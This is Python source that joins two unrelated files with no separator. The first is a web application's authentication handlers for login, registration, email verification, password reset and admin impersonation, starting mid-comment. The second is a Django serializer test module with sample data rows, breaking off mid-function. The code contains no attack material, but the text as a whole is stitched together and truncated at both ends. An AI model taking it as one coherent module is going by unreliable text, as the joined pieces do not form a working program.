check. The form might not be an IndicoForm # but a normal WTForm from Flask-WTF which does not use the same # CSRF token as Indico forms use. But since the form has its own # CSRF check anyway disabling the global check is perfectly fine. CSRF_ENABLED = False def _process(self): login_reason = session.pop('login_reason', None) # User is already logged in if session.user is not None: multipass.set_next_url() return multipass.redirect_success() # Some clients attempt to incorrectly resolve redirections internally. # See https://github.com/indico/indico/issues/4720 for details user_agent = request.headers.get('User-Agent', '') sso_redirect = not any(s in user_agent for s in ('ms-office', 'Microsoft Office')) # If we have only one provider, and this provider is external, we go there immediately # However, after a failed login we need to show the page to avoid a redirect loop if not session.pop('_multipass_auth_failed', False) and 'provider' not in request.view_args and sso_redirect: single_auth_provider = multipass.single_auth_provider if single_auth_provider and single_auth_provider.is_external: multipass.set_next_url() return redirect(url_for('.login', provider=single_auth_provider.name)) # Save the 'next' url to go to after login multipass.set_next_url() # If there's a provider in the URL we start the external login process if 'provider' in request.view_args: provider = _get_provider(request.view_args['provider'], True) return provider.initiate_external_login() # If we have a POST request we submitted a login form for a local provider rate_limit_exceeded = False if request.method == 'POST': active_provider = provider = _get_provider(request.form['_provider'], False) form = provider.login_form() rate_limit_exceeded = not login_rate_limiter.test() if not rate_limit_exceeded and form.validate_on_submit(): response = multipass.handle_login_form(provider, form.data) if response: return response # re-check since a failed login may have triggered the rate limit rate_limit_exceeded = not login_rate_limiter.test() # Otherwise we show the form for the default provider else: active_provider = multipass.default_local_auth_provider form = active_provider.login_form() if active_provider else None providers = list(multipass.auth_providers.values()) retry_in = login_rate_limiter.get_reset_delay() if rate_limit_exceeded else None return render_template('auth/login_page.html', form=form, providers=providers, active_provider=active_provider, login_reason=login_reason, retry_in=retry_in) class RHLoginForm(RH): """Retrieve a login form (json).""" def _process(self): provider = _get_provider(request.view_args['provider'], False) form = provider.login_form() template_module = get_template_module('auth/_login_form.html') return jsonify(success=True, html=template_module.login_form(provider, form)) class RHLogout(RH): """Log the user out.""" def _process(self): next_url = request.args.get('next') if not next_url or not multipass.validate_next_url(next_url): next_url = url_for_index() return multipass.logout(next_url, clear_session=True) def _send_confirmation(email, salt, endpoint, template, template_args=None, url_args=None, data=None): template_args = template_args or {} url_args = url_args or {} token = secure_serializer.dumps(data or email, salt=salt) url = url_for(endpoint, token=token, _external=True, **url_args) template_module = get_template_module(template, email=email, url=url, **template_args) send_email(make_email(email, template=template_module)) flash(_('We have sent you a verification email. Please check your mailbox within the next hour and open ' 'the link in that email.')) return redirect(url_for(endpoint, **url_args)) class RHLinkAccount(RH): """Link a new identity with an existing user. This RH is only used if the identity information contains an email address and an existing user was found. """ def _process_args(self): self.identity_info = load_identity_info() if not self.identity_info or self.identity_info['indico_user_id'] is None: # Just redirect to the front page or whereever we wanted to go. # Probably someone simply used his browser's back button. flash('There is no pending login.', 'warning') return multipass.redirect_success() self.user = User.get(self.identity_info['indico_user_id']) self.emails = sorted(self.user.all_emails & set(self.identity_info['data'].getlist('email'))) self.verification_email_sent = self.identity_info.get('verification_email_sent', False) self.email_verified = self.identity_info['email_verified'] self.must_choose_email = len(self.emails) != 1 and not self.email_verified def _process(self): if self.verification_email_sent and 'token' in request.args: email = secure_serializer.loads(request.args['token'], max_age=3600, salt='link-identity-email') if email not in self.emails: raise BadData('Emails do not match') session['login_identity_info']['email_verified'] = True session.modified = True flash(_('You have successfully validated your email address and can now proceed with the login.'), 'success') return redirect(url_for('.link_account', provider=self.identity_info['provider'])) if self.must_choose_email: form = SelectEmailForm() form.email.choices = list(zip(self.emails, self.emails)) else: form = IndicoForm() if form.validate_on_submit(): if self.email_verified: return self._create_identity() elif not self.verification_email_sent: return self._send_confirmation(form.email.data if self.must_choose_email else self.emails[0]) else: flash(_('The validation email has already been sent.'), 'warning') return WPAuth.render_template('link_identity.html', identity_info=self.identity_info, user=self.user, email_sent=self.verification_email_sent, emails=' / '.join(self.emails), form=form, must_choose_email=self.must_choose_email) def _create_identity(self): identity = Identity(user=self.user, provider=self.identity_info['provider'], identifier=self.identity_info['identifier'], data=self.identity_info['data'], multipass_data=self.identity_info['multipass_data']) logger.info('Created new identity for %s: %s', self.user, identity) del session['login_identity_info'] db.session.flush() login_user(self.user, identity) return multipass.redirect_success() def _send_confirmation(self, email): session['login_identity_info']['verification_email_sent'] = True session['login_identity_info']['data']['email'] = email # throw away other emails return _send_confirmation(email, 'link-identity-email', '.link_account', 'auth/emails/link_identity_verify_email.txt', {'user': self.user}, url_args={'provider': self.identity_info['provider']}) class RHRegister(RH): """Create a new indico user. This handles two cases: - creation of a new user with a locally stored username and password - creation of a new user based on information from an identity provider """ def _process_args(self): self.identity_info = None self.provider_name = request.view_args['provider'] if self.provider_name is not None: self.identity_info = info = load_identity_info() if not info: return redirect(url_for('.login')) elif info['indico_user_id'] is not None or info['provider'] != self.provider_name: # If we have a matching user id, we shouldn't be on the registration page # If the provider doesn't match it would't be a big deal but the request doesn't make sense raise BadRequest elif not config.LOCAL_IDENTITIES: raise Forbidden('Local identities are disabled') elif not config.LOCAL_REGISTRATION: raise Forbidden('Local registration is disabled') def _get_verified_email(self): """Check if there is an email verification token.""" try: token = request.args['token'] except KeyError: return None, None try: return secure_serializer.loads(token, max_age=3600, salt='register-email'), False except BadSignature: return secure_serializer.loads(token, max_age=86400 * 31, salt='register-email-prevalidated'), True def _process(self): if session.user: return redirect(url_for_index()) handler = MultipassRegistrationHandler(self) if self.identity_info else LocalRegistrationHandler(self) verified_email, prevalidated = self._get_verified_email() if verified_email is not None: handler.email_verified(verified_email) if prevalidated: flash(_('You may change your email address after finishing the registration process.'), 'info') else: flash(_('You have successfully validated your email address and can now proceed with the ' 'registration.'), 'success') return redirect(url_for('.register', provider=self.provider_name)) form = handler.create_form() if not handler.moderate_registrations and not handler.must_verify_email: del form.comment # Check for pending users if we have verified emails pending = None if not handler.must_verify_email: pending = User.query.filter(~User.is_deleted, User.is_pending, User.all_emails.in_(list(handler.get_all_emails(form)))).first() if form.validate_on_submit(): if handler.must_verify_email: return self._send_confirmation(form.email.data) elif handler.moderate_registrations: return self._create_registration_request(form, handler) else: return self._create_user(form, handler) elif not form.is_submitted() and pending: # If we have a pending user, populate empty fields with data from that user for field in form: value = getattr(pending, field.short_name, '') if value and not field.data: field.data = value if pending: flash(_('There is already some information in Indico that concerns you. ' 'We are going to link it automatically.'), 'info') return WPAuth.render_template('register.html', form=form, local=(not self.identity_info), must_verify_email=handler.must_verify_email, widget_attrs=handler.widget_attrs, email_sent=session.pop('register_verification_email_sent', False), moderate_accounts=handler.moderate_registrations) def _send_confirmation(self, email): session['register_verification_email_sent'] = True return _send_confirmation(email, 'register-email', '.register', 'auth/emails/register_verify_email.txt', url_args={'provider': self.provider_name}) def _prepare_registration_data(self, form, handler): email = form.email.data extra_emails = handler.get_all_emails(form) - {email} user_data = {k: v for k, v in form.data.items() if k in {'first_name', 'last_name', 'affiliation', 'address', 'phone'}} user_data.update(handler.get_extra_user_data(form)) identity_data = handler.get_identity_data(form) settings = { 'timezone': config.DEFAULT_TIMEZONE if session.timezone == 'LOCAL' else session.timezone, 'lang': session.lang or config.DEFAULT_LOCALE } return {'email': email, 'extra_emails': extra_emails, 'user_data': user_data, 'identity_data': identity_data, 'settings': settings} def _create_registration_request(self, form, handler): registration_data = self._prepare_registration_data(form, handler) email = registration_data['email'] req = RegistrationRequest.query.filter_by(email=email).first() or RegistrationRequest(email=email) req.comment = form.comment.data req.populate_from_dict(registration_data) db.session.add(req) db.session.flush() signals.users.registration_requested.send(req) flash(_('Your registration request has been received. We will send you an email once it has been processed.'), 'success') return handler.redirect_success() def _create_user(self, form, handler): user, identity = register_user(**self._prepare_registration_data(form, handler)) login_user(user, identity) msg = _('You have sucessfully registered your Indico profile. ' 'Check <a href="{url}">your profile</a> for further details and settings.') flash(Markup(msg).format(url=url_for('users.user_profile')), 'success') db.session.flush() return handler.redirect_success() class RHAccounts(RHUserBase): """Display user accounts.""" def _create_form(self): if self.user.local_identity: defaults = FormDefaults(username=self.user.local_identity.identifier) local_account_form = EditLocalIdentityForm(identity=self.user.local_identity, obj=defaults) else: local_account_form = AddLocalIdentityForm() return local_account_form def _handle_add_local_account(self, form): identity = Identity(provider='indico', identifier=form.data['username'], password=form.data['password']) self.user.identities.add(identity) logger.info('User %s added a local account (%s)', self.user, identity.identifier) flash(_('Local account added successfully'), 'success') def _handle_edit_local_account(self, form): self.user.local_identity.identifier = form.data['username'] if form.data['new_password']: self.user.local_identity.password = form.data['new_password'] session.pop('insecure_password_error', None) logger.info('User %s (%s) changed their password', self.user, self.user.local_identity.identifier) flash(_('Your local account credentials have been updated successfully'), 'success') def _process(self): insecure_login_password_error = session.get('insecure_password_error') form = self._create_form() if form.validate_on_submit(): if isinstance(form, AddLocalIdentityForm): self._handle_add_local_account(form) elif isinstance(form, EditLocalIdentityForm): self._handle_edit_local_account(form) return redirect(url_for('auth.accounts')) provider_titles = {name: provider.title for name, provider in multipass.identity_providers.items()} return WPAuthUser.render_template('accounts.html', 'accounts', form=form, user=self.user, provider_titles=provider_titles, insecure_login_password_error=insecure_login_password_error) class RHRemoveAccount(RHUserBase): """Remove an identity linked to a user.""" def _process_args(self): RHUserBase._process_args(self) self.identity = Identity.get_or_404(request.view_args['identity']) if self.identity.user != self.user: raise NotFound() def _process(self): if session.get('login_identity') == self.identity.id: raise BadRequest("The identity used to log in can't be removed") if self.user.local_identity == self.identity: raise BadRequest("The main local identity can't be removed") self.user.identities.remove(self.identity) try: provider_title = multipass.identity_providers[self.identity.provider].title except KeyError: provider_title = self.identity.provider.title() flash(_('{provider} ({identifier}) successfully removed from your accounts' .format(provider=provider_title, identifier=self.identity.identifier)), 'success') return redirect(url_for('.accounts')) class RegistrationHandler: form = None def __init__(self, rh): pass def email_verified(self, email): raise NotImplementedError def get_form_defaults(self): raise NotImplementedError def create_form(self): defaults = self.get_form_defaults() if self.must_verify_email: # We don't bother with multiple emails here. The case that the provider sends more # than one email AND those emails are untrusted is so low it's simply not worth it. # The only drawback in that situation would be not showing the extra emails to the # user... return RegistrationEmailForm(obj=defaults) else: return self.form(obj=defaults) @property def widget_attrs(self): return {} @property def must_verify_email(self): raise NotImplementedError @property def moderate_registrations(self): return False def get_all_emails(self, form): # All (verified!) emails that should be set on the user. # This MUST include the primary email from the form if available. # Any additional emails will be set as secondary emails # The emails returned here are used to check for pending users return {form.email.data} if form.validate_on_submit() else set() def get_identity_data(self, form): raise NotImplementedError def get_extra_user_data(self, form): return {} def redirect_success(self): raise NotImplementedError class MultipassRegistrationHandler(RegistrationHandler): def __init__(self, rh): self.identity_info = rh.identity_info @property def from_sync_provider(self): # If the multipass login came from the provider that's used for synchronization return multipass.sync_provider and multipass.sync_provider.name == self.identity_info['provider'] def email_verified(self, email): session['login_identity_info']['data']['email'] = email session['login_identity_info']['email_verified'] = True session.modified = True def get_form_defaults(self): return FormDefaults(self.identity_info['data']) def create_form(self): form = super().create_form() # We only want the phone/address fields if the provider gave us data for it for field in {'address', 'phone'}: if field in form and not self.identity_info['data'].get(field): delattr(form, field) emails = self.identity_info['data'].getlist('email') form.email.choices = list(zip(emails, emails)) return form def form(self, **kwargs): if self.from_sync_provider: synced_values = {k: v or '' for k, v in self.identity_info['data'].items()} return MultipassRegistrationForm(synced_fields=multipass.synced_fields, synced_values=synced_values, **kwargs) else: return MultipassRegistrationForm(**kwargs) @property def must_verify_email(self): return not self.identity_info['email_verified'] @property def moderate_registrations(self): return self.identity_info['moderated'] def get_all_emails(self, form): emails = super().get_all_emails(form) return emails | set(self.identity_info['data'].getlist('email')) def get_identity_data(self, form): del session['login_identity_info'] return {'provider': self.identity_info['provider'], 'identifier': self.identity_info['identifier'], 'data': self.identity_info['data'], 'multipass_data': self.identity_info['multipass_data']} def get_extra_user_data(self, form): data = super().get_extra_user_data(form) if self.from_sync_provider: data['synced_fields'] = form.synced_fields | {field for field in multipass.synced_fields if field not in form} return data def redirect_success(self): return multipass.redirect_success() class LocalRegistrationHandler(RegistrationHandler): form = LocalRegistrationForm def __init__(self, rh): next_url = request.args.get('next') if next_url and multipass.validate_next_url(next_url): session['register_next_url'] = next_url @property def widget_attrs(self): return {'email': {'disabled': not self.must_verify_email}} @property def must_verify_email(self): return 'register_verified_email' not in session @property def moderate_registrations(self): return config.LOCAL_MODERATION def get_all_emails(self, form): emails = super().get_all_emails(form) if not self.must_verify_email: emails.add(session['register_verified_email']) return emails def email_verified(self, email): session['register_verified_email'] = email def get_form_defaults(self): email = session.get('register_verified_email') existing_user_id = session.get('register_pending_user') existing_user = User.get(existing_user_id) if existing_user_id else None data = {'email': email} if existing_user: data.update(first_name=existing_user.first_name, last_name=existing_user.last_name, affiliation=existing_user.affiliation) return FormDefaults(**data) def create_form(self): form = super().create_form() if not self.must_verify_email: form.email.data = session['register_verified_email'] return form def get_identity_data(self, form): del session['register_verified_email'] return {'provider': 'indico', 'identifier': form.username.data, 'password_hash': Identity.password.backend.create_hash(form.password.data)} def redirect_success(self): return redirect(session.pop('register_next_url', url_for_index())) class RHResetPassword(RH): """Reset the password for a local identity.""" def _process_args(self): if not config.LOCAL_IDENTITIES: raise Forbidden('Local identities are disabled') def _process(self): if 'token' in request.args: identity_id = secure_serializer.loads(request.args['token'], max_age=3600, salt='reset-password') identity = Identity.get(identity_id) if not identity: raise BadData('Identity does not exist') return self._reset_password(identity) else: return self._request_token() def _request_token(self): form = ResetPasswordEmailForm() if form.validate_on_submit(): user = form.user # The only case where someone would have more than one identity is after a merge. # And the worst case that can happen here is that we send the user a different # username than the one he expects. But he still gets back into his profile. # Showing a list of usernames would be a little bit more user-friendly but less # secure as we'd expose valid usernames for a specific user to an untrusted person. identity = next(iter(user.local_identities)) _send_confirmation(form.email.data, 'reset-password', '.resetpass', 'auth/emails/reset_password.txt', {'user': user, 'username': identity.identifier}, data=identity.id) session['resetpass_email_sent'] = True logger.info('Password reset requested for user %s', user) return redirect(url_for('.resetpass')) return WPAuth.render_template('reset_password.html', form=form, identity=None, widget_attrs={}, email_sent=session.pop('resetpass_email_sent', False)) def _reset_password(self, identity): form = ResetPasswordForm() if form.validate_on_submit(): identity.password = form.password.data flash(_('Your password has been changed successfully.'), 'success') login_user(identity.user, identity) logger.info('Password reset confirmed for user %s', identity.user) # We usually come here from a multipass login page so we should have a target url return multipass.redirect_success() form.username.data = identity.identifier return WPAuth.render_template('reset_password.html', form=form, identity=identity, email_sent=False, widget_attrs={'username': {'disabled': True}}) class RHAdminImpersonate(RHAdminBase): @use_kwargs({ 'undo': fields.Bool(missing=False), 'user_id': fields.Int(missing=None) }) def _process_args(self, undo, user_id): RHAdminBase._process_args(self) self.user = None if undo else User.get_or_404(user_id, is_deleted=False) def _check_access(self): if self.user: RHAdminBase._check_access(self) def _process(self): if self.user: impersonate_user(self.user) else: # no user? it means it's an undo undo_impersonate_user() return jsonify()
""" A test spanning all the capabilities of all the serializers. This class defines sample data and a dynamically generated test case that is capable of testing the capabilities of the serializers. This includes all valid data values, plus forward, backwards and self references. """ from __future__ import absolute_import, unicode_literals import datetime import decimal try: import yaml except ImportError: yaml = None from django.core import serializers from django.core.serializers import SerializerDoesNotExist from django.core.serializers.base import DeserializationError from django.db import connection, models from django.http import HttpResponse from django.test import TestCase from django.utils.functional import curry from django.utils import six from django.utils.six.moves import StringIO from django.utils.unittest import skipUnless from .models import (BooleanData, CharData, DateData, DateTimeData, EmailData, FileData, FilePathData, DecimalData, FloatData, IntegerData, IPAddressData, GenericIPAddressData, NullBooleanData, PhoneData, PositiveIntegerData, PositiveSmallIntegerData, SlugData, SmallData, TextData, TimeData, USStateData, GenericData, Anchor, UniqueAnchor, FKData, M2MData, O2OData, FKSelfData, M2MSelfData, FKDataToField, FKDataToO2O, M2MIntermediateData, Intermediate, BooleanPKData, CharPKData, EmailPKData, FilePathPKData, DecimalPKData, FloatPKData, IntegerPKData, IPAddressPKData, GenericIPAddressPKData, PhonePKData, PositiveIntegerPKData, PositiveSmallIntegerPKData, SlugPKData, SmallPKData, USStatePKData, AutoNowDateTimeData, ModifyingSaveData, InheritAbstractModel, BaseModel, ExplicitInheritBaseModel, InheritBaseModel, ProxyBaseModel, ProxyProxyBaseModel, BigIntegerData, LengthModel, Tag, ComplexModel, NaturalKeyAnchor, FKDataNaturalKey) # A set of functions that can be used to recreate # test data objects of various kinds. # The save method is a raw base model save, to make # sure that the data in the database matches the # exact test case. def data_create(pk, klass, data): instance = klass(id=pk) instance.data = data models.Model.save_base(instance, raw=True) return [instance] def generic_create(pk, klass, data): instance = klass(id=pk) instance.data = data[0] models.Model.save_base(instance, raw=True) for tag in data[1:]: instance.tags.create(data=tag) return [instance] def fk_create(pk, klass, data): instance = klass(id=pk) setattr(instance, 'data_id', data) models.Model.save_base(instance, raw=True) return [instance] def m2m_create(pk, klass, data): instance = klass(id=pk) models.Model.save_base(instance, raw=True) instance.data = data return [instance] def im2m_create(pk, klass, data): instance = klass(id=pk) models.Model.save_base(instance, raw=True) return [instance] def im_create(pk, klass, data): instance = klass(id=pk) instance.right_id = data['right'] instance.left_id = data['left'] if 'extra' in data: instance.extra = data['extra'] models.Model.save_base(instance, raw=True) return [instance] def o2o_create(pk, klass, data): instance = klass() instance.data_id = data models.Model.save_base(instance, raw=True) return [instance] def pk_create(pk, klass, data): instance = klass() instance.data = data models.Model.save_base(instance, raw=True) return [instance] def inherited_create(pk, klass, data): instance = klass(id=pk,**data) # This isn't a raw save because: # 1) we're testing inheritance, not field behavior, so none # of the field values need to be protected. # 2) saving the child class and having the parent created # automatically is easier than manually creating both. models.Model.save(instance) created = [instance] for klass,field in instance._meta.parents.items(): created.append(klass.objects.get(id=pk)) return created # A set of functions that can be used to compare # test data objects of various kinds def data_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) testcase.assertEqual(data, instance.data, "Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)" % ( pk, data, type(data), instance.data, type(instance.data)) ) def generic_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) testcase.assertEqual(data[0], instance.data) testcase.assertEqual(data[1:], [t.data for t in instance.tags.order_by('id')]) def fk_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) testcase.assertEqual(data, instance.data_id) def m2m_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) testcase.assertEqual(data, [obj.id for obj in instance.data.order_by('id')]) def im2m_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) #actually nothing else to check, the instance just should exist def im_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) testcase.assertEqual(data['left'], instance.left_id) testcase.assertEqual(data['right'], instance.right_id) if 'extra' in data: testcase.assertEqual(data['extra'], instance.extra) else: testcase.assertEqual("doesn't matter", instance.extra) def o2o_compare(testcase, pk, klass, data): instance = klass.objects.get(data=data) testcase.assertEqual(data, instance.data_id) def pk_compare(testcase, pk, klass, data): instance = klass.objects.get(data=data) testcase.assertEqual(data, instance.data) def inherited_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) for key,value in data.items(): testcase.assertEqual(value, getattr(instance,key)) # Define some data types. Each data type is # actually a pair of functions; one to create # and one to compare objects of that type data_obj = (data_create, data_compare) generic_obj = (generic_create, generic_compare) fk_obj = (fk_create, fk_compare) m2m_obj = (m2m_create, m2m_compare) im2m_obj = (im2m_create, im2m_compare) im_obj = (im_create, im_compare) o2o_obj = (o2o_create, o2o_compare) pk_obj = (pk_create, pk_compare) inherited_obj = (inherited_create, inherited_compare) test_data = [ # Format: (data type, PK value, Model Class, data) (data_obj, 1, BooleanData, True), (data_obj, 2, BooleanData, False), (data_obj, 10, CharData, "Test Char Data"), (data_obj, 11, CharData, ""), (data_obj, 12, CharData, "None"), (data_obj, 13, CharData, "null"), (data_obj, 14, CharData, "NULL"), (data_obj, 15, CharData, None), # (We use something that will fit into a latin1 database encoding here, # because that is still the default used on many system setups.) (data_obj, 16, CharData, '\xa5'), (data_obj, 20, DateData, datetime.date(2006,6,16)), (data_obj, 21, DateData, None), (data_obj, 30, DateTimeData, datetime.datetime(2006,6,16,10,42,37)), (data_obj, 31, DateTimeData, None), (data_obj, 40, EmailData, "hovercraft@example.com"), (data_obj, 41, EmailData, None), (data_obj, 42, EmailData, ""), (data_obj, 50, FileData, 'file:///foo/bar/whiz.txt'), # (data_obj, 51, FileData, None), (data_obj, 52, FileData, ""), (data_obj, 60, FilePathData, "/foo/bar/whiz.txt"), (data_obj, 61, FilePathData, None), (data_obj, 62, FilePathData, ""), (data_obj, 70, DecimalData, decimal.Decimal('12.345')), (data_obj, 71, DecimalData, decimal.Decimal('-12.345')), (data_obj, 72, DecimalData, decimal.Decimal('0.0')), (data_obj, 73, DecimalData, None), (data_obj, 74, FloatData, 12.345), (data_obj, 75, FloatData, -12.345), (data_obj, 76, FloatData, 0.0), (data_obj, 77, FloatData, None), (data_obj, 80, IntegerData, 123456789), (data_obj, 81, IntegerData, -123456789), (data_obj, 82, IntegerData, 0), (data_obj, 83, IntegerData, None), #(XX, ImageData (data_obj, 90, IPAddressData, "127.0.0.1"), (data_obj, 91, IPAddressData, None), (data_obj, 95, GenericIPAddressData, "fe80:1424:2223:6cff:fe8a:2e8a:2151:abcd"), (data_obj, 96, GenericIPAddressData, None), (data_obj, 100, NullBooleanData, True), (data_obj, 101, NullBooleanData, False), (data_obj, 102, NullBooleanData, None), (data_obj, 110, PhoneData, "212-634-5789"), (data_obj, 111, PhoneData, None), (data_obj, 120, PositiveIntegerData, 123456789), (data_obj, 121, PositiveIntegerData, None), (data_obj, 130, PositiveSmallIntegerData, 12), (data_obj, 131, PositiveSmallIntegerData, None), (data_obj, 140, SlugData, "this-is-a-slug"), (data_obj, 141, SlugData, None), (data_obj, 142, SlugData, ""), (data_obj, 150, SmallData, 12), (data_obj, 151, SmallData, -12), (data_obj, 152, SmallData, 0), (data_obj, 153, SmallData, None), (data_obj, 160, TextData, """This is a long piece of text. It contains line breaks. Several of them. The end."""), (data_obj, 161, TextData, ""), (data_obj, 162, TextData, None), (data_obj, 170, TimeData, datetime.time(10,42,37)), (data_obj, 171, TimeData, None), (data_obj, 180, USStateData, "MA"), (data_obj, 181, USStateData, None), (data_obj, 182, USStateData, ""), (generic_obj, 200, GenericData, ['Generic Object 1', 'tag1', 'tag2']), (generic_obj, 201, GenericData, ['Generic Object 2', 'tag2', 'tag3']), (data_obj, 300, Anchor, "Anchor 1"), (data_obj, 301, Anchor, "Anchor 2"), (data_obj, 302, UniqueAnchor, "UAnchor 1"), (fk_obj, 400, FKData, 300), # Post reference (fk_obj, 401, FKData, 500), # Pre reference (fk_obj, 402, FKData, None), # Empty reference (m2m_obj, 410, M2MData, []), # Empty set (m2m_obj, 411, M2MData, [300,301]), # Post reference (m2m_obj, 412, M2MData, [500,501]), # Pre reference (m2m_obj, 413, M2MData, [300,301,500,501]), # Pre and Post reference (o2o_obj, None, O2OData, 300), # Post reference (o2o_obj, None, O2OData, 500), # Pre reference (fk_obj, 430, FKSelfData, 431), # Pre reference (fk_obj, 431, FKSelfData, 430), # Post reference (fk_obj, 432, FKSelfData, None), # Empty reference (m2m_obj, 440, M2MSelfData, []), (m2m_obj, 441, M2MSelfData, []), (m2m_obj, 442, M2MSelfData, [440, 441]), (m2m_obj, 443, M2MSelfData, [445, 446]), (m2m_obj, 444, M2MSelfData, [440, 441, 445, 446]), (m2m_obj, 445, M2MSelfData, []), (m2m_obj, 446, M2MSelfData, []), (fk_obj, 450, FKDataToField, "UAnchor 1"), (fk_obj, 451, FKDataToField, "UAnchor 2"), (fk_obj, 452, FKDataToField, None), (fk_obj, 460, FKDataToO2O, 300), (im2m_obj, 470, M2MIntermediateData, None), #testing post- and prereferences and extra fields (im_obj, 480, Intermediate, {'right': 300, 'left': 470}), (im_obj, 481, Intermediate, {'right': 300, 'left': 490}), (im_obj, 482, Intermediate, {'right': 500, 'left': 470}), (im_obj, 483, Intermediate, {'right': 500, 'left': 490}), (im_obj, 484, Intermediate, {'right': 300, 'left': 470, 'extra': "extra"}), (im_obj, 485, Intermediate, {'right': 300, 'left': 490, 'extra': "extra"}), (im_obj, 486, Intermediate, {'right': 500, 'left': 470, 'extra': "extra"}), (im_obj, 487, Intermediate, {'right': 500, 'left': 490, 'extra': "extra"}), (im2m_obj, 490, M2MIntermediateData, []), (data_obj, 500, Anchor, "Anchor 3"), (data_obj, 501, Anchor, "Anchor 4"), (data_obj, 502, UniqueAnchor, "UAnchor 2"), (pk_obj, 601, BooleanPKData, True), (pk_obj, 602, BooleanPKData, False), (pk_obj, 610, CharPKData, "Test Char PKData"), # (pk_obj, 620, DatePKData, datetime.date(2006,6,16)), # (pk_obj, 630, DateTimePKData, datetime.datetime(2006,6,16,10,42,37)), (pk_obj, 640, EmailPKData, "hovercraft@example.com"), # (pk_obj, 650, FilePKData, 'file:///foo/bar/whiz.txt'), (pk_obj, 660, FilePathPKData, "/foo/bar/whiz.txt"), (pk_obj, 670, DecimalPKData, decimal.Decimal('12.345')), (pk_obj, 671, DecimalPKData, decimal.Decimal('-12.345')), (pk_obj, 672, DecimalPKData, decimal.Decimal('0.0')), (pk_obj, 673, FloatPKData, 12.345), (pk_obj, 674, FloatPKData, -12.345), (pk_obj, 675, FloatPKData, 0.0), (pk_obj, 680, IntegerPKData, 123456789), (pk_obj, 681, IntegerPKData, -123456789), (pk_obj, 682, IntegerPKData, 0), # (XX, ImagePKData (pk_obj, 690, IPAddressPKData, "127.0.0.1"), (pk_obj, 695, GenericIPAddressPKData, "fe80:1424:2223:6cff:fe8a:2e8a:2151:abcd"), # (pk_obj, 700, NullBooleanPKData, True), # (pk_obj, 701, NullBooleanPKData, False), (pk_obj, 710, PhonePKData, "212-634-5789"), (pk_obj, 720, PositiveIntegerPKData, 123456789), (pk_obj, 730, PositiveSmallIntegerPKData, 12), (pk_obj, 740, SlugPKData, "this-is-a-slug"), (pk_obj, 750, SmallPKData, 12), (pk_obj, 751, SmallPKData, -12), (pk_obj, 752, SmallPKData, 0), # (pk_obj, 760, TextPKData, """This is a long piece of text. # It contains line breaks. # Several of them. # The end."""), # (pk_obj, 770, TimePKData, datetime.time(10,42,37)), (pk_obj, 780, USStatePKData, "MA"), # (pk_obj, 790, XMLPKData, "<foo></foo>"), (data_obj, 800, AutoNowDateTimeData, datetime.datetime(2006,6,16,10,42,37)), (data_obj, 810, ModifyingSaveData, 42), (inherited_obj, 900, InheritAbstractModel, {'child_data':37,'parent_data':42}), (inherited_obj, 910, ExplicitInheritBaseModel, {'child_data':37,'parent_data':42}), (inherited_obj, 920, InheritBaseModel, {'child_data':37,'parent_data':42}), (data_obj, 1000, BigIntegerData, 9223372036854775807), (data_obj, 1001, BigIntegerData, -9223372036854775808), (data_obj, 1002, BigIntegerData, 0), (data_obj, 1003, BigIntegerData, None), (data_obj, 1004, LengthModel, 0), (data_obj, 1005, LengthModel, 1), ] natural_key_test_data = [ (data_obj, 1100, NaturalKeyAnchor, "Natural Key Anghor"), (fk_obj, 1101, FKDataNaturalKey, 1100), (fk_obj, 1102, FKDataNaturalKey, None), ] # Because Oracle treats the empty string as NULL, Oracle is expected to fail # when field.empty_strings_allowed is True and the value is None; skip these # tests. if connection.features.interprets_empty_strings_as_nulls: test_data = [data for data in test_data if not (data[0] == data_obj and data[2]._meta.get_field('data').empty_strings_allowed and data[3] is None)] # Regression test for #8651 -- a FK to an object iwth PK of 0 # This won't work on MySQL since it won't let you create an object # with a primary key of 0, if connection.features.allows_primary_key_0: test_data.extend([ (data_obj, 0, Anchor, "Anchor 0"), (fk_obj, 465, FKData, 0), ]) # Dynamically create serializer tests to ensure that all # registered serializers are automatically tested. class SerializerTests(TestCase): def test_get_unknown_serializer(self): """ #15889: get_serializer('nonsense') raises a SerializerDoesNotExist """ with self.assertRaises(SerializerDoesNotExist): serializers.get_serializer("nonsense") with self.assertRaises(KeyError): serializers.get_serializer("nonsense") # SerializerDoesNotExist is instantiated with the nonexistent format with self.assertRaises(SerializerDoesNotExist) as cm: serializers.get_serializer("nonsense") self.assertEqual(cm.exception.args, ("nonsense",)) def test_unregister_unkown_serializer(self): with self.assertRaises(SerializerDoesNotExist): serializers.unregister_serializer("nonsense") def test_get_unkown_deserializer(self): with self.assertRaises(SerializerDoesNotExist): serializers.get_deserializer("nonsense") def test_json_deserializer_exception(self): with self.assertRaises(DeserializationError): for obj in serializers.deserialize("json", """[{"pk":1}"""): pass @skipUnless(yaml, "PyYAML not installed") def test_yaml_deserializer_exception(self): with self.assertRaises(DeserializationError): for obj in serializers.deserialize("yaml", "{"): pass def test_serialize_proxy_model(self): BaseModel.objects.create(parent_data=1) base_objects = BaseModel.objects.all() proxy_objects = ProxyBaseModel.objects.all() proxy_proxy_objects = ProxyProxyBaseModel.objects.all() base_data = serializers.serialize("json", base_objects) proxy_data = serializers.serialize("json", proxy_objects) proxy_proxy_data = serializers.serialize("json", proxy_proxy_objects) self.assertEqual(base_data, proxy_data.replace('proxy', '')) self.assertEqual(base_data, proxy_proxy_data.replace('proxy', '')) def serializerTest(format, self): # Create all the objects defined in the test data objects = [] instance_count = {} for (func, pk, klass, datum) in test_data: with connection.constraint_checks_disabled(): objects.extend(func[0](pk, klass, datum)) # Get a count of the number of objects created for each class for klass in instance_count: instance_count[klass] = klass.objects.count() # Add the generic tagged objects to the object list objects.extend(Tag.objects.all()) # Serialize the test database serialized_data = serializers.serialize(format, objects, indent=2) for obj in serializers.deserialize(format, serialized_data): obj.save() # Assert that the deserialized data is the same # as the original source for (func, pk, klass, datum) in test_data: func[1](self, pk, klass, datum) # Assert that the number of objects deserialized is the # same as the number that was serialized. for klass, count in instance_count.items(): self.assertEqual(count, klass.objects.count()) def naturalKeySerializerTest(format, self): # Create all the objects defined in the test data objects = [] instance_count = {} for (func, pk, klass, datum) in 